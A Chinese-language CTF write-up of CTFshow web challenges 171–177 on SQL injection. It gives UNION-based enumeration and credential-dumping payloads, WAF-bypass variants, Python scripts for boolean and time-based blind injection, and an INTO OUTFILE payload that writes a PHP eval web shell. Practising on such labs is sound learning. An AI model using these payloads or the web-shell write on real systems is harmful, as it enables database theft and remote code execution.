CTFSHOW-web入门-sql注入

Posted on

2021/8/25

web171

查库名

1
0' union select 1,database(),3 --+  //ctfshow_web

查表名

1
0' union select 1,group_concat(table_name),3  from information_schema.tables where table_schema=database() --+   //ctfshow_user

查列名

1
0' union select 1,group_concat(column_name),3  from information_schema.columns where table_name='ctfshow_user' --+   //id,username,password

查数据

1
0' union select id,username,password  from ctfshow_user --+     //flag

web172

1
2
3
4
5
6
7
8
//拼接sql语句查找指定ID用户
$sql = "select username,password from ctfshow_user2 where username !='flag' and id = '".$_GET['id']."' limit 1;";


//检查结果是否有flag
    if($row->username!=='flag'){
      $ret['msg']='查询成功';
    }

要求username字段不能出现flag

查列数

1
1' order by 2 --+  //一共两列

查库名

1
0' union select 1,database() --+  //ctfshow_web

查表名

1
0' union select 1,group_concat(table_name)  from information_schema.tables where table_schema=database() --+   //ctfshow_user2

查数据

1
2
3
4
5
0' union select username,group_concat(password)  from ctfshow_user2 --+    //flag

0' union select hex(username),password  from ctfshow_user2 --+     //flag

0' union select to_base64(username),password  from ctfshow_user2 --+   //flag

web173

1
2
3
4
5
6
7
8
//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user3 where username !='flag' and id = '".$_GET['id']."' limit 1;";


//检查结果是否有flag
    if(!preg_match('/flag/i', json_encode($ret))){
      $ret['msg']='查询成功';
    }

对返回的数据进行过滤

查列数

1
1' order by 3 --+  //一共两列

查库名

1
0' union select 1,database(),3 --+  //ctfshow_web

查表名

1
0' union select 1,group_concat(table_name),3  from information_schema.tables where table_schema=database() --+   //ctfshow_user3

查数据

1
2
3
4
5
0' union select username,group_concat(password),3  from ctfshow_user3 --+    //flag

0' union select hex(username),password,3  from ctfshow_user3 --+      //flag

0' union select to_base64(username),password,3  from ctfshow_user3 --+     //flag

2021/8/27

web174

1
2
3
4
5
6
7
//拼接sql语句查找指定ID用户
$sql = "select username,password from ctfshow_user4 where username !='flag' and id = '".$_GET['id']."' limit 1;";

//检查结果是否有flag
    if(!preg_match('/flag|[0-9]/i', json_encode($ret))){
      $ret['msg']='查询成功';
    }

检测返回结果是否有flag和数字 如果存在就不输出

1
1' union select  replace(username,'g','a') ,'a' from ctfshow_user4 --+
方法一

查列数

1
1' order by 2 --+

查库名

1
0' union select 'a',database() --+   //ctfshow_web

查表名

1
2
3
0' union select 'a',replace(group_concat(table_name),'4','a') from information_schema.tables where table_schema=database() --+   //ctfshow_user4

这里已经知道了是4.....

查列名

1
0' union select 'a',group_concat(column_name)  from information_schema.columns where table_name='ctfshow_user4' --+ //id,username,password

查username值

1
2
3
0' union select to_base64(username),'password'  from ctfshow_user4 --+ //ZmxhZw== //flag

0' union select replace(username,'f','a'),'password'  from ctfshow_user4 --+  //alag

查password值

1
2
3
4
5
6
0' union select replace(username,'f','a'),replace(replace(password,'0','a'),'1','b')  from ctfshow_user4 --+

 0' union select replace(username,'f','a'),replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(password,'0','numa'),'1','numb'),'2','numc'),'3','numd'),'4','nume'),'5','numf'),'6','numg'),'7','numh'),'8','numi'),'9','numj') from ctfshow_user4 --+

 
 0' union select to_base64(username),replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(password,'0','numa'),'1','numb'),'2','numc'),'3','numd'),'4','nume'),'5','numf'),'6','numg'),'7','numh'),'8','numi'),'9','numj') from ctfshow_user4 --+

把字母变成数字

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<?php
$flag='ctfshow{numeenumdnumhfnumhbnumf-anumbnumic-numenumhnumhd-numinumbnumjnuma-denumcnumhnumeanumcnumecnumdnumgnumh}';
$flag=str_replace('numa','0',$flag);
$flag=str_replace('numb','1',$flag);
$flag=str_replace('numc','2',$flag);
$flag=str_replace('numd','3',$flag);
$flag=str_replace('nume','4',$flag);
$flag=str_replace('numf','5',$flag);
$flag=str_replace('numg','6',$flag);
$flag=str_replace('numh','7',$flag);
$flag=str_replace('numi','8',$flag);
$flag=str_replace('numj','9',$flag);
echo $flag;
?>
方法二

写文件方法 前提是设置了允许写文件

1
2
3
0' union select username,password from ctfshow_user4 into outfile '/var/www/html/1.txt' --+  //返回信息 Query OK, 1 row affected (0.01 sec)

0' union select 1,'<?php eval($_POST["5"]);?>' into outfile '/var/www/html/eval.php' %23
方法三

盲注

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#-- coding:UTF-8 --
# Author:dota_st
# Date:2021/3/16 16:24
# blog: www.wlhhlc.top
import requests
url = "http://151c9166-3b26-4211-8350-66208a82b250.challenge.ctf.show:8080/api/v4.php"
dict = "0123456789abcdefghijklmnopqrstuvwxyz{}-"
flag = ""
for i in range(1,50):
    for j in dict:
        payload = f"?id=1' and substr((select password from ctfshow_user4 where username=\"flag\"),{i},1)=\"{j}\"--+"
        gloal = url + payload
        res = requests.get(url=gloal)
        if 'admin' in res.text:
            flag += j
            print(flag)
            break
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
# -*- coding: utf-8 -*-
# @Author  : Yn8rt
# @Time    : 2021/7/25 17:17
# @Function:
import requests
url = "http://151c9166-3b26-4211-8350-66208a82b250.challenge.ctf.show:8080/api/v4.php"
flag = ''

for i in range(0,100):  # 创建一个整数列表
    max = 128  # ASCII可见字符
    min = 32
    while 1:
        mid = min+((max-min)//2)  # 取整除 - 向下取接近商的整数
        if min==mid:
            flag+=chr(mid)
            print(flag)
            break
        payload="?id=' union select 'a'," \
                "if(ascii(substr((select group_concat(password) " \
                "from ctfshow_user4 where username='flag'),%d,1))<%d," \
                "'yes','true')+--+"%(i,mid)
        res = requests.get(url=url+payload).text
        #print(res)
        if "yes" in res:
            max = mid
        else:
            min = mid
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
min  max  mid    
32    128     80

80   128      104


80   104     92


92    104    98

98     104    101

98  101      99


99  101   100


99   100    99
1
payload="?id=' union select 'a',if(ascii(substr((select group_concat(password) from ctfshow_user4 where username='flag'),%d,1))<%d,'small','da')+--+"%(i,mid)
1
payload="?id=' union select 'a',if(ascii(substr((select group_concat(password) from ctfshow_user4 where username='flag'),1,1))<57,'small','da')+--+"%(i,mid)

web175

1
2
3
4
5
6
7
//拼接sql语句查找指定ID用户
$sql = "select username,password from ctfshow_user4 where username !='flag' and id = '".$_GET['id']."' limit 1;";

//检查结果是否有flag
    if(!preg_match('/flag|[0-9]/i', json_encode($ret))){
      $ret['msg']='查询成功';
    }
方法一
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
# -*- coding: utf-8 -*-
# @Author  : Yn8rt
# @Time    : 2021/7/25 17:17
# @Function:
import requests
from  time import  time

url = "http://a2addd19-ec90-4350-b049-8cc20db4de09.challenge.ctf.show:8080/api/v5.php"
flag = ''

for i in range(0, 100):  # 创建一个整数列表
    max = 128  # ASCII可见字符
    min = 32
    while 1:
        mid = min + ((max - min) // 2)  # 取整除 - 向下取接近商的整数
        if min == mid:
            flag += chr(mid)
            print(flag)
            break
        payload = "?id=' union select 'a'," \
                  "if(ascii(substr((select group_concat(password) " \
                  "from ctfshow_user5 where username='flag'),%d,1))<%d," \
                  "sleep(0.5),1)+--+" % (i, mid)

        start_time=time()
        res = requests.get(url=url + payload).text
        end_time=time()
        # print(res)

        if end_time-start_time>0.48 :
            max = mid
        else:
            min = mid
方法二

写文件

1
0' union select username,password from ctfshow_user5 into outfile '/var/www/html/1.txt' --+  //返回信息 Query OK, 1 row affected (0.01 sec)

2021/9/3

web176

源码:

1
2
3
4
5
6
7
8
//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";


//对传入的参数进行了过滤
  function waf($str){
   //代码过于简单,不宜展示
  }
方法一

查列数

1
1' order by 3 --+

查库名

1
2
3
0' unIoN SelEcT 1,database(),3 --+  //ctfshow_web

1' unIoN SelEcT 1,database(),3 --+  //ctfshow_web

查表名

1
0' unIoN SelEcT 1,group_concat(taBle_nAme),3 From infoRmaTion_schEma.taBles wHerE table_schema=database() --+  //ctfshow_user

查列名

1
2
3
4
5
0' unIoN SelEcT 1,group_concat(Column_nAme),3 From infoRmaTion_schEma.colUmns wHerE table_name='ctfshow_user' --+ //id,username,password



0' unIoN SelEcT 1,group_concat(column_name),3 from information_schema.columns where table_name='ctfshow_user' --+ //id,username,password

查username值

1
0' unIoN SelEcT id,username,password From ctfshow_user --+ //flag

查password值

1
0' unIoN SelEcT id,username,password From ctfshow_user --+ //flag

貌似只过滤了 union select

方法二

万能密码

1
1' or 1=1 --+  //输出所有字段

web177

查列数

1
1'/**/order/**/by/**/3/**/%23

查库名

1
0'/**/union/**/select/**/1,database(),3/**/%23  //ctfshow_web

查表名

1
0'/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/%23 //ctfshow_user

查列名

1
0'/**/union/**/select/**/1,group_concat(column_name),3/**/from/**/information_schema.columns/**/where/**/table_name='ctfshow_user'/**/%23 //id,username,password

查字段内容

1
0'/**/union/**/select/**/id,username,password/**/from/**/ctfshow_user/**/%23 //flag